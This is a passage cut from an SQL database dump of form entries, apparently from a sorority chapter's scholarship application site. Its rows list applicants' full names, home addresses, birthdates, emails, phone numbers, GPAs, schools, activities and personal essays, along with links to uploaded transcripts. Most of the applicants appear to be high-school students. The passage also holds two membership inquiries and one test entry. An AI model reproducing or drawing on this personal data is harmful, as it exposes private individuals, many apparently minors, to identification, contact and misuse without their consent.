Ave'),(4517,387,6,19.3,'Laurel'),(4518,387,6,19.4,'MD'),(4519,387,6,19.5,'20723'),(4520,387,6,19.6,'United States'),(4521,387,6,4,'08/11/1989'),(4522,387,6,21,'rachel.carver@howardcc.edu'),(4523,387,6,20,'(240) 393-6867'),(4524,387,6,10,'Howard Community College'),(4525,387,6,27,'HCC Women of Color Program'),(4526,387,6,28,'n/a'),(4527,387,6,9,'3.8'),(4528,387,6,26,'Culinary Arts/ Baking and Pastries'),(4529,387,6,12,'140'),(4530,387,6,14,'Career Links-member 6 months'),(4531,387,6,13,'Deans List- Fall 2011 Fall 2012 Spring  2012 Summer 2012 Spring 2013'),(4532,387,6,36,'Volunteer- Daily Planet Sept 2012-Dec 2012  organized chair exercises for homeless population in respite care to encourage movement through their recovery time.'),(4533,387,6,37,'Howard Community College'),(4534,387,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Final-draft-Women-of-Color-Essay-Question.docx'),(4535,387,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Combined-VCU-and-HCC-unofficial-transcript.pdf'),(4536,387,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPB-release-form.pdf'),(4537,388,6,18.3,'David'),(4538,388,6,18.6,'Ledbetter'),(4539,388,6,19.1,'3334 N Chatham Rd Apt J'),(4540,388,6,19.3,'Ellicott City'),(4541,388,6,19.4,'Maryland'),(4542,388,6,19.5,'21042'),(4543,388,6,19.6,'United States'),(4544,388,6,4,'10-23-2001'),(4545,388,6,21,'dledbetter456@gmail.com'),(4546,388,6,20,'(240) 305-5339'),(4547,388,6,10,'Centennial High School'),(4548,388,6,27,'School Counselor/Advisor'),(4549,388,6,28,'N/A'),(4550,388,6,9,'3.3'),(4551,388,6,26,'computer engineering'),(4552,388,6,12,'NA'),(4553,388,6,14,'BSU (Black Student Union): President, 2 years.\r\nAlpha Achievers: 2 years, member\r\nVarsity Football Captain (2 years)\r\nIndoor Track & Field (State qualifier, 1 year participation)'),(4554,388,6,13,'Gold Honor Roll (every quarter, 2 years)\r\nStudent Athlete Award (2017-2020)\r\nBlack Student Achievement Program Award Nominee for Centennial High School (County winner not decided yet)'),(4555,388,6,36,'Held a potluck for families in need for the holidays at New Fellowship Chr. Community Church in Baltimore, on Park Heights Ave.\r\n(November 2018 and November 2019)\r\n\r\nPlanned and participated in the presentation of service at New Fellowship Community church (2019 - Present)\r\n\r\nTaught programming, robotics and circuits to children at Georgetown Day school in NW Washington D.C. \r\n(Summer 2017 & Summer 2018)'),(4556,388,6,37,'North Carolina A&T\r\nVirginia Tech\r\nNorth Carolina State @ Raleigh\r\nUMBC'),(4557,388,6,41,'Essay D. In the children’s book Curious George, George the chimp learns about the world around him by exploring new adventures. About what are you most curious and how might a college education set you on a course to new adventures to satisfy your curiosities? (500-word essay maximum)\r\nI am most curious about the world we live in and how technology has advanced our understanding of the universe. Over seven billion people live on Earth and technology has enabled a cohesive environment despite us occupying more space. Humans have been able to unmask and explore unknown aspects of the Earth and the universe due to technology. For instance, remotely operated vehicles are used to explore the sea, satellites have expanded our knowledge of outer space, and radiology has been used to see inside the human body. \r\nAlthough the world is vast, technology has made it smaller. I seek to further reduce the tremendous list of unknowns in our world through continued advancements in technology. Our society has only scratched the surface. There is much more for us to learn in key areas such as medicine, space, agriculture, and energy. Innovation in technology is critical to continual evolution. \r\nAs I study computer science and engineering in college, I will gain the essential skills needed to understand the framework of current technology and gain knowledge that will lead me to develop new technology. My goal is to apply my college education and add new advancements to the field of computer science. I will further multiply human capabilities and provide exceptional benefits to society in fields such as artificial intelligence and quantum technology.\r\nThe human mind is an absolute work of art. Humans are set apart from computers because we are preset with over seven trillion nerves. The nervous system is an intricate grouping of nerves and neurons that sends messages throughout the body while learning and teaching itself. Computer systems can be programmed to behave as humans and learn to predict as well. Computer scientists and engineers build datasets tailored for a computer to understand; however, computers still have a limited role because they do not come with the sensing and reasoning advantages that humans have.\r\nNevertheless, computers abilities are expanding, and the world of artificial intelligence will further reduce computers limitations. As I use my college education to explore technology, the unknowns of the world will also reduce, and I will be able to understand my curiosities in computer science. My college education is an essential element that will contribute to my course toward new technology advancements.'),(4558,388,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Curious-George-Essay.pdf'),(4559,388,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/unofficialtranscript.pdf'),(4560,388,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/releaseformzeta.pdf'),(4561,389,6,18.3,'Zion'),(4562,389,6,18.6,'Olibris'),(4563,389,6,19.1,'11321 Ridermark Row'),(4564,389,6,19.3,'Columbia'),(4565,389,6,19.4,'Maryland'),(4566,389,6,19.5,'21044'),(4567,389,6,19.6,'United States'),(4568,389,6,4,'05-07-02'),(4569,389,6,21,'zolibris@gmail.com'),(4570,389,6,20,'(443) 459-7781'),(4571,389,6,10,'Wilde Lake High School'),(4572,389,6,27,'Friend/Family Member'),(4573,389,6,28,'N/A'),(4574,389,6,9,'3.53'),(4575,389,6,26,'Business and Law'),(4576,389,6,12,'NA'),(4577,389,6,14,'Wilde Lake HS National Honor Society – Member; October 2018 – Present\r\nWilde Lake HS National Technical Honor Society – Member; January 2019 – Present\r\nWilde Lake HS Class Council - Member: Sept. 2018 – Present'),(4578,389,6,13,'Bank of America 2019 Student Leader\r\nWilde Lake HS Academic Honor Roll: 2016 – 2019\r\n2017 STAR Scholarship Award Recipient'),(4579,389,6,36,'Wilde Lake HS Allied Soccer Team; Volunteer Assistant: Sept. 2017 – Nov. 2019\r\nWilde Lake HS Allied Softball Team; Volunteer Assistant: March 2019 – Present\r\nWilde Lake HS Best Buddies – Member/Peer Volunteer: Sept. 2018 – Present\r\nYouth Opportunity Academy; Volunteer Math Tutor: Jan. 2019 – Present \r\nHoward County Teen Court; Volunteer Juror: Jan. 2019 – May 2019 & Feb. 2018 – May 2018\r\nASCEND Program; Participant/Volunteer: Sept. 2016 - May 2018 \r\nDr. Bernard Harris School Food Pantry; Lead Volunteer: Sept. 2014 – Present\r\nSt John\'s Catholic Church Life Teen Program; Participant: Sept. 2014 – Aug. 2018'),(4580,389,6,37,'Villanova University\r\nUniversity of Delaware\r\nUniversity of Maryland College Park\r\nUniversity of Richmond\r\nSyracuse University'),(4581,389,6,40,'In the movie Avengers: The End Game, the Avengers must defeat Thanos the evil demigod. Similarly, criminal injustice and the lack of education in prison is a societal issue that I would like to “defeat”. In an era of mass incarceration, America is the world’s largest jailer. There are over 2 million people in prison and about 630,000 are released annually. A big problem in America is that there is a recidivism rate of nearly 50%. People that are leaving prison are extremely likely to end up going back within three years. This may be due to the lack of economic opportunities offered to people with felonies which in turn leads them back to a life of crime. One solution to this problem that seems to be effective is higher education within the prison system.\r\nAs a Bank of America Student Leader, I attended a week-long summit in Washington, DC, where I participated in leadership workshops, listened to speeches about issues in our country and communities around us, and met with senators and their staffers on Capitol Hill. During the summit, we watched a preview of a film called College Behind Bars, directed and produced by Lynn Novick and produced by Sarah Botstein. It was about a program called the Bard Prison Initiative, one of the most rigorous and effective prison education programs in the country. The film follows the story of young men and women in the prison system as they go through the challenging curriculum and finish with an associate and bachelor’s degree from Bard. But the main takeaway I got from the documentary was the massive difference in the recidivism rate from that of average prisoners, with it falling from the national average of nearly 50% all the way down to 5%. It amazed me that what appeared to be such a simple solution, was implemented so sparsely nationwide. The government seems to easily be able to find money to build new prisons but fails to address the reason why they’re needed.\r\nStudies almost unanimously indicate that higher education in prison reduces recidivism and in turn reduces crime. A new report by the Vera Institute of Justice and Georgetown Center on Poverty and Inequality states that when formerly incarcerated people reenter the job market with higher levels of education they are more likely to find jobs and less likely to return to prison. People would think that the primary problem with implementing these programs nationwide is the cost. Contrary to that belief, the report found that incarceration costs across states would likely decrease by $365.8 million a year because of a decrease in recidivism rates. I believe that what is instead hindering progress is people’s view of prison as a place for punishment instead of rehabilitation. I believe that obtaining my law degree will enable me to become adept in the field of law and fight against injustices within the criminal justice system.'),(4582,389,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/0844_001.pdf'),(4583,389,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Photorelease.pdf'),(4584,389,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Photo.pdf'),(4585,390,6,18.3,'Jada'),(4586,390,6,18.6,'Charon'),(4587,390,6,19.1,'10733 Taylor Farm Road'),(4588,390,6,19.3,'Woodstock'),(4589,390,6,19.4,'MD'),(4590,390,6,19.5,'21163'),(4591,390,6,19.6,'United States'),(4592,390,6,4,'01-21-02'),(4593,390,6,21,'dcharon1@verizon.net'),(4594,390,6,20,'(410) 336-5057'),(4595,390,6,10,'Marriotts Ridge High School'),(4596,390,6,27,'Other'),(4597,390,6,28,'Black History Expo'),(4598,390,6,9,'3.31'),(4599,390,6,26,'Business Administration'),(4600,390,6,12,'3 - Dual Enrollment Class'),(4601,390,6,14,'2018-2020 - National Society of High School Scholars\r\n2019-2020 - National Honor Society\r\n2017-2020 - Delta Scholars (fundraising chair during junior year, vice president senior year) must maintain a 3.0 GPA to remain a member\r\n2016-2020 - Black Student Union ( co-president senior year)'),(4602,390,6,13,'2013-2020 -  The Council of Elders of the Black Community of Howard County\r\n2014 - Science Project Fair - 1st Place\r\n2016 - Certificate of Achievement- Mt. View Middle School\r\n2016-2020 Honor Roll\r\n2016-2017 - Scholar Athletic Award - 3.25 or better while participating in sports\r\n2017 - Offensive player of the year (soccer)'),(4603,390,6,36,'2012 - 2016 Dr. Betty Shabazz Academy\r\n2016-2020 - Delta Gems \r\nSince 2007 - Alter server in church\r\n2019-2020 - Youth NAACP\r\nJuly 16 - July 21, 2017 (overnight) - Youth Police Academy\r\n11/6/2018, 2/4/2020 - Electioneering\r\n10/06/2020 - 5k race volunteer\r\n01/2020 Phone Banking\r\n01/27/2020 - Leadership conference\r\n02/2019; 02/15/2020 Black History Expo'),(4604,390,6,37,'1 - Salisbury State University - Accepted - notified school and paid deposit \r\n2 - Frostburg State University - Accepted'),(4605,390,6,41,'See attached.'),(4606,390,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Scholarship-Essay-Curious-George-by-Jada-Charon.docx'),(4607,390,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Jada-Charon-Unofficial-Transcript-2020-1.pdf'),(4608,390,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Photo-Release-Form-Zeta-Phi-Beta.pdf'),(4609,391,6,18.3,'Asha'),(4610,391,6,18.6,'Taylor'),(4611,391,6,19.1,'7608 Hearthside Way apt 1022'),(4612,391,6,19.3,'Elkridge'),(4613,391,6,19.4,'MD'),(4614,391,6,19.5,'21075'),(4615,391,6,19.6,'United States'),(4616,391,6,4,'10-01-2001'),(4617,391,6,21,'ashataylor5253@gmail.com'),(4618,391,6,20,'(240) 360-8388'),(4619,391,6,10,'Mt. Hebron High School'),(4620,391,6,27,'Other'),(4621,391,6,28,'my Delta Scholar\'s sponsor, Ms. Sandy Harrington'),(4622,391,6,9,'3.38'),(4623,391,6,26,'Journalism'),(4624,391,6,12,'22 total college credits'),(4625,391,6,14,'Yes, I have help membership positions in the following clubs:\r\n-Delta Scholars, 3 years of membership, held position of Community Service Coordinator for 1 year\r\n-Writer for The Mountain (my school\'s newspaper), 3 years of membership, held position of Chief Editor for 1 year\r\n-National Honors Society, 2 years of membership, held position as a general member for 2 years\r\n-Womxn’s Magazine, 1 year of membership, held position as writer for 1 year'),(4626,391,6,13,'I have consistently been awarded with the Honor Roll award for my academic performance in high school. I have also been awarded Student of the Month my freshman, sophomore, and junior years.'),(4627,391,6,36,'I have been a frequent volunteer for the Jean & Moon Associates Foundation. I have participated in various events including, Breakfast with Santa,  Columbia\'s 50th Anniversary, and Soup\'r Sundae. All are examples of events I have helped out with. I have also worked at Lighthouse Nursing Home where I had the opportunity to Play games, talk, serve food, exercise, and learn from the amazing elderly residents. I worked here from  March of 2019 to January of 2020.  I also hold an internship at Studio 202 D.C. where I run a radio show known as, Party Life of Music Radio every Tuesday night. I have been doing this since the beginning of my junior year.'),(4628,391,6,37,'I will be committing to Howard University in D.C.'),(4629,391,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Zeta-Phi-Beta-Scholarship-Essay.pdf'),(4630,391,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Asha-Taylor-transcript.pdf'),(4631,391,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZETA-PHI-BETA-SCHOLARSHIP.pdf'),(4632,392,10,1.3,'Dayesha'),(4633,392,10,1.6,'Sims'),(4634,392,10,3,'Dayster4@gmail.com'),(4635,392,10,5,'(410) 300-7866'),(4636,392,10,2,'Interested in Membership'),(4637,392,10,4,'Good evening, \r\n\r\nI would love to learn about your next community service event. \r\n\r\nThank you,'),(4638,393,6,18.3,'Abigail'),(4639,393,6,18.6,'Paul'),(4640,393,6,19.1,'8427 Each Leaf Ct.'),(4641,393,6,19.3,'Columbia'),(4642,393,6,19.4,'MD'),(4643,393,6,19.5,'21045'),(4644,393,6,19.6,'United States'),(4645,393,6,4,'08/25/02'),(4646,393,6,21,'abbyp305@gmail.com'),(4647,393,6,20,'(410) 707-6282'),(4648,393,6,10,'Long Reach High School'),(4649,393,6,27,'BSAP Advisor'),(4650,393,6,28,'N/A'),(4651,393,6,9,'3.62-Cumulative 3.86-Quarterly'),(4652,393,6,26,'Nursing'),(4653,393,6,12,'NA'),(4654,393,6,14,'Lightning Leaders (2018-Present)\r\nDelta Scholars (2018-Present)\r\n- President (2019-Present)\r\nBadminton Club (2019-Present)\r\n-Vice-President (2019-Present)\r\n-Treasurer (2019-Present)\r\nBlack Student Union (2019-Present)\r\nActive Minds (2019-Present)\r\nSocial Studies National Honor Society (2019-Present)\r\nNational Honor Society (2019-Present)\r\nLRTV News (2019-Present)'),(4655,393,6,13,'Silver Honor Roll (2016-2017)\r\n-All A\'s, B\'s and one C\r\nGold Honor Roll (2018-Present) \r\n-All A\'s and B\'s\r\nApplications and Research Laboratory Student of the Month\r\n-October 2018\r\n-November 2019'),(4656,393,6,36,'Saturday Math Academy (2018-Present) \r\n-Tutors kids of all ages in different levels of math\r\nHoliday Clothing Drive (Winter 2018- Present)\r\n- Collect and wrap gift donations for homeless families'),(4657,393,6,37,'Towson University\r\nStevenson University'),(4658,393,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/W-Ruth-Conway-Scholarship.pdf'),(4659,393,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Transcript0001.pdf'),(4660,393,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/R-PhotoRelease.pdf'),(4661,394,7,1.3,'Malia'),(4662,394,7,1.6,'Wellman'),(4663,394,7,2,'bawellman@me.com'),(4664,394,7,3,'Pearlette Club'),(4665,394,7,4,'My name is Brother Bryant Wellman, and I’m member of Phi Beta Sigma Fraternity Inc.  I was hoping to receive information about your Pearlette Club for my 4 year old daughter Malia Wellman.  Thank you in advance for your help and consideration.'),(4666,395,6,18.3,'Amaiyah'),(4667,395,6,18.6,'Epps'),(4668,395,6,19.1,'8414 Gold Sunset Way'),(4669,395,6,19.3,'Columbia'),(4670,395,6,19.4,'Maryland'),(4671,395,6,19.5,'21045'),(4672,395,6,19.6,'United States'),(4673,395,6,4,'08-30-02'),(4674,395,6,21,'epps.ringgold4@gmail.com'),(4675,395,6,20,'(410) 979-9079'),(4676,395,6,10,'Oakland Mills High School'),(4677,395,6,27,'BSAP Advisor'),(4678,395,6,28,'N/A'),(4679,395,6,9,'2.93'),(4680,395,6,26,'Psychology'),(4681,395,6,12,'NA'),(4682,395,6,14,'Student Government Association (2 years, Secretary, 2nd Vice President)\r\nBlack Student Union (2 years, Member, President)\r\nFuture Healthcare Workers of America (1 year, 2nd Vice President)\r\nBlack Student Achievement Program (4 years, Member)\r\nGender Sexuality Alliance (1 year, member)'),(4683,395,6,13,'Student of the Month (January 2017: Wilde Lake High School)\r\nHonor Roll (2017-2018: Oakland Mills High School)'),(4684,395,6,36,'11/28/2019 Oakland Mills HS Annual Community Thanksgiving Dinner: Supported Alpha Achievers with planning and photography of the event where over 300 individuals were served.\r\n4/13/2018 HCPL/HCPSS Battle of the Books: Helped direct, encourage, instruct students participating in the county-wide race during competition day.\r\n11/20/2018 Oakland Mills HS Annual Community Thanksgiving Dinner: Supported Alpha Achievers with food, facility set-up and photography of the event where over 200 individuals were served.\r\n11/18/2017 GSCM Daisy Day at Camp: Helped facilitate Girl Scout activities and managing the safety of the Girl Scout campers during the day camp.\r\n04/10/17 Maryland Food Bank: Sort and check donated food expiration dates, pack boxes and create meal kits. \r\n03/06/17 Girl Scouts of Maryland Mall Sleep IN: Working the bracelet table for the younger troops and managing the safety of the Girl Scouts throughout the night (Daisies, Brownies, Jr. Girl Scouts, and Cadettes).'),(4685,395,6,37,'Hood College\r\nMcDaniel College\r\nFrostburg State University\r\nMout St. Marys College'),(4686,395,6,38,'When I was growing up, people would always ask me what I wanted to be when I grew up. That question opened my mind to billions of possibilities. My list ranged from lawyer to graphic designer and beyond. Once I grew a little more the goal became helping people; as well as finding something I loved so much that it never felt like a job. I signed up for the class Introduction to Psychology and fell in love with it. Directly following my discovery, I spoke with my school psychologist asking about different jobs in the field. After speaking with him, I asked a few friends, if they had ever talked to the school psychologist. My encounter has led me to discover many shared the same opinion, which was not feeling comfortable just due to their appearance. \r\nCultural diversity and meeting the needs of diverse students is an issue that remains on the doorsteps of schools and communities everywhere. I think the lack of people of color in the school system, as well as representation throughout administration, is a big issue today. As a student of color, I want to find people who look like me and a comfortable safe space to share any problems that I may be having. I want to feel like I\'ve been heard and have gotten everything off my chest. Now being a senior, I know teenagers need one thing other than food, air, and water; they need support. Support comes in forms of communication, love or kindness and genuine care. \r\nGiving back to the place that once welcomed me with open arms (Oakland Mills High School) is a part of my plan to make a difference. I’m not sure what the result will be but I have prepared my steps. Step one is to graduate high school and go to a college of my choosing with a major in psychology and a minor in film studies. Step two is to take all my classes to graduate with my masters in five years. Step three is to find a job in my field and start working to complete my doctorate. Last, but not least, step four is to work to complete my doctorate and return to Oakland Mills’ Psychology department. A big part of my plan is to be able to give back to the Oakland Mills community that I now call my home away from home. Step five is my absolute final step, which is to be one of many educators to become a part of the movement to put people of color into the public school system, as teachers and administrators .'),(4687,395,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/A-Epps-Unofficial-Transcript.pdf'),(4688,395,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Zeta-Phi-Beta-Photo-Release.pdf'),(4689,395,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Amaiyah-Epps-co-2020.pdf'),(4690,396,6,18.3,'Naomi'),(4691,396,6,18.6,'Washington'),(4692,396,6,19.1,'6805 Green Mill Way'),(4693,396,6,19.3,'Columbia'),(4694,396,6,19.4,'MD'),(4695,396,6,19.5,'21044'),(4696,396,6,19.6,'United States'),(4697,396,6,4,'08-16-02'),(4698,396,6,21,'nwashington747@gmail.com'),(4699,396,6,20,'(609) 832-2147'),(4700,396,6,10,'Atholton High School'),(4701,396,6,27,'School Counselor/Advisor'),(4702,396,6,28,'teacher'),(4703,396,6,9,'3.71'),(4704,396,6,26,'Journalism and Political Science'),(4705,396,6,12,'NA'),(4706,396,6,14,'I am involved in many of my school’s academic and extracurricular activities. I write for my school’s online and print newspaper, the Raider Review, as a section editor and I work as a broadcast anchor for our video news series. This school year, I also earned the position of the Delta Scholars Chapter Historian after being involved the previous year. These commitments are important to me as well as my two-year involvement in National Honor Society, National English Honor Society, and National Spanish Honor Society. I also had the pleasure of serving in my school’s Black Student Union (BSU) organization as vice president and Principal Advisory Committee (PAC) group as president. I participated in BSU for two years and PAC for one year.'),(4707,396,6,13,'I represented Morgantown High School’s Health Science Technology Academy (HSTA) chapter in a public research symposium presentation (2016).I received a perfect score on my research presentation: “The Effects of Texting and Driving.” In my junior year, I completed a year-long scholarly research endeavor in my Independent Research class. I compiled my research on chronic homelessness in America into a project that included a poster board, a video presentation, and an extensive research paper (2019). This year, I received the Atholton High School Girls’ Varsity Soccer Letterman Award (2019) year at the end of the soccer season at the school’s sports awards night. This award is given to the player on the team who is nominated by their teammates for excellent sportsmanship and leadership despite not having the role of team captain.'),(4708,396,6,36,'I’ve been conducting research for my Intern Mentor class as a student intern since May 2019 at HopeWorks of Howard County Domestic Violence Crisis Center. I do a lot of volunteer work as well. I was a student volunteer in 2017 at Howard County Library Central Branch for their “Libraries Rock” Summer Reading Program. I participated in the library for two summers in a row. I am a Becca’s Closet club member. Our organization benefits the community by collecting used and new dresses for our annual prom event hosted at our school where girls from all over the county can come and pick out dresses for free. With my church, Bridgeway Community Church, I participated in the Homeless Cold Weather Shelter in 2018 and I am a current member in the BridgeStudents Youth group. I also have a job at an exercise gym in Columbia, Maryland as a front desk attendant. I started in December 2019.'),(4709,396,6,37,'I was accepted into six universities; Penn State University Park, Temple University, Drexel University, Howard University, North Carolina A&T, and Elon University. Of those schools, I have chosen to study at Elon University for the next four years in their school of communications.'),(4710,396,6,41,'I did not know how to use my voice, nor did I recognize how well I could write until my sophomore year in high school. Even then, I didn\'t quite understand yet how speaking out about the issues I am passionate about can make all the difference. So, I didn’t take advantage of every opportunity to write or speak my opinions. Until I began to hear from my teachers, \"Wow, you can write very well,\" which grabbed my attention. \r\n\r\nAfter taking journalism for two years in high school, I knew that I wanted to continue chasing news for the rest of my life. I look back at my past self and laugh because I thought I wanted to be a dentist when I grew up. But nothing fulfills me more than learning the role of a broadcast anchor, writing monthly newsletters for the Youth Leadership project at my HopeWorks internship, and editing for the school newspaper. Just when I thought journalism could not get any more exciting, in September 2019, I traveled to New York City to attend the United Nations General Assembly Conference with the Bridgeway Community Church Youth Delegation group. The event was sponsored by the Writers and Journalists Foundation, where leaders from all over the world came to speak about their views on education, youth issues, and global change. I conducted a short interview with one of the leaders I met and had the opportunity to ask panelists thought-provoking questions. Following the conference, our youth delegation group continued to figure out how we could zoom in on our community and make an impact. Through this discussion, we are beginning a Youtube channel based upon the 17 Sustainable Development Goals that will engage students in the area. I will be a regular host and social media manager for the Youtube channel. All this experience is slowly immersing me into the world of journalism. \r\n\r\nIn my eyes, I view a college education as a priority for me because I know my skill set will be taken to the next level. And with that, I want to go to a university without the worry of whether or not I\'ll be able to pay for school. I deserve the W. Ruth Conway scholarship because I have been working for opportunities such as this one my whole high school career. One day, I hope to be a Today Show television host in New York City. So this scholarship would be a spectacular kickstart to my journey and a tremendous blessing.'),(4711,396,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/W.-Ruth-Conway-Essay.docx'),(4712,396,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Naomi-Transcript-100419.pdf'),(4713,396,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan0009.pdf'),(4714,397,6,18.3,'kathy'),(4715,397,6,18.6,'ball'),(4716,397,6,19.1,'sdasdff'),(4717,397,6,19.3,'clarksville'),(4718,397,6,19.4,'MD'),(4719,397,6,19.5,'21029'),(4720,397,6,19.6,'United States'),(4721,397,6,4,'101065'),(4722,397,6,21,'wrightbey@gmail.com'),(4723,397,6,20,'(410) 707-9211'),(4724,397,6,10,'Atholton High School'),(4725,397,6,27,'BSAP Advisor'),(4726,397,6,28,'n/a'),(4727,397,6,9,'4.0'),(4728,397,6,26,'retirement'),(4729,397,6,12,'NA'),(4730,397,6,14,'Test to make sure the site is working'),(4731,397,6,13,'I am so smart'),(4732,397,6,36,'love service too'),(4733,397,6,37,'AARP'),(4734,397,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/2020fLYER.pdf'),(4735,397,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Bio.docx'),(4736,397,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Catering-Menu-Conway-Reception.pdf'),(4737,398,6,18.3,'Anjayooluwa'),(4738,398,6,18.6,'Adegboyo'),(4739,398,6,19.1,'5321 Briar Oak Court'),(4740,398,6,19.3,'Ellicott City'),(4741,398,6,19.4,'MD'),(4742,398,6,19.5,'21043'),(4743,398,6,19.6,'United States'),(4744,398,6,4,'02-15-02'),(4745,398,6,21,'jmiester.jayo@gmail.com'),(4746,398,6,20,'(240) 401-0653'),(4747,398,6,10,'Howard High School'),(4748,398,6,27,'Friend/Family Member'),(4749,398,6,28,'N/A'),(4750,398,6,9,'3.73'),(4751,398,6,26,'Biophysics (Pre-med)'),(4752,398,6,12,'4'),(4753,398,6,14,'Yes I hold membership in multiple academic clubs/organizations\r\n\r\n1. National Honors Society for 3 years, Member\r\n2. National Society of Black Engineers, Jr. for 3 years, Member\r\n3. Science National Honors Society for 3 years, Member\r\n4. Math Honors Society for 4 years, Member\r\n5. National Technical Honors Society for 4 years, Member'),(4754,398,6,13,'1. College Board AP Scholar with Distinction in 2019\r\n2. College Board AP Scholar in 2018\r\n3. Science Student of the Month, Howard High School, November 2018'),(4755,398,6,36,'1. University of Maryland Medical Center, Trauma Resuscitation Unit: aid nurses in getting supplies for nurses for admitted patients, support and observe status delivery from doctor to patients and family (November 2019 to Present)\r\n2. Howard County Library: sorted books for logical placement on shelf, signed children and student up for summer reading program, awarded prize for program completion (Summer 2018 and 2019)\r\n3. Rotary Club Elkridge: for the 55th and 56th Annual Bull and Oyster Roast, I setup tables with schedules/programs, solicited for raffle draw tickets, dressed and prepared tables and items for the night auction events, collected payments and provided receipt and change to auction winners, distributed paid auction items to winners (January 26, 2019 and January 25, 2020)\r\n4. Howard County Food Bank: provide shopping assistance to client, assist client with loading groceries into their cars, returned shopping carts into store, arranged and tidied store whenever products were moved (October 2018 to Present)\r\n5. Helping Up Mission: Served food to people with financial difficulties, who were trying to get back on their feet (July 21 and August 1, 2018)\r\n6. Community Baptist Church: selected coats, hats and gloves from Burlington Coat Factory to purchase for the needy, age 5-16 years, packaged food for the poor and needy, fed the poor and needy thanksgiving dinner (November 2017 to Present)\r\n7. Physics Tutoring: taught Physics C: Mechanics Concepts to physics students who faced difficulty with the class (September 2017 - Present)\r\n8. Alpha Achievers: as a member, provided mathematics tutoring to elementary and middle school students (September 2016-September 2017)'),(4756,398,6,37,'1. University of Maryland University College (UMBC)\r\n2. University of Maryland, College Park\r\n3. Central State University\r\n4. Waynesburg University'),(4757,398,6,40,'A prominent issue faced by students is the overwhelming amount of debt they accrue upon graduation. Additionally, many people, like my twin brother, have psychological and/or neurophysiological disorders that limit their career options. I want to dedicate my future to helping people young and old alike, so that they get a chance at societal and financial breakthroughs. \r\n\r\n	From a very young age, my twin brother, Jola, was diagnosed with a condition on the autism spectrum that limits his learning curve and ability to express himself to others. Due to his psychological disorder, my sister, my parents, and I have had to help him convey his feelings to others who may not understand Jola’s situation. Because I have lived most of my life with a loved one who was robbed of his chance at exploring his interest in everyday activities that most people take for granted, I want to help others in similar situations as Jola overcome the challenges they face. With my college education, I hope to begin conducting structured research that is geared toward helping treat people on the autism spectrum, and since I do not have much experience with research aside from personal research for the fun of it, having seniors and a faculty that have been through the process countless times will provide me resources to guide my research design and application. It is through doing this that I will be able to gain experience that will carry me into my goal of obtaining an MD/PhD in a degree pertaining to neurological biology.\r\n\r\n	I also would like to address the issue of students deciding to not pursue a certain career because they cannot afford the education required to obtain a degree in that desired career. A college education would equip me with the skillset required to handle this societal issue because I intend to learn important investment techniques from business classes and from people on campus who may be financially successful. By learning how to invest, I can grow my own finances to a significant level while developing a business to help treat people with psychological and/or neurophysiological disorders. With enough time, I would have enough money to support myself comfortably so I can develop a scholarship program and provide funds to as many people around the globe as possible to allow them work towards the goal of achieving their dreams.\r\n\r\n	Investing in my dreams not only helps me achieve my goals, but it also opens up the possibility to serve others. Through my efforts, I hope to help treat people with psychological and neurophysiological disorders like my twin brother Jola, so they do not have to limit their scope of success due to their disadvantages, and I intend to alleviate financial inconveniences to such individuals as well. This will not only help the bright minds of tomorrow, but also bring their talents a chance to help future innovative 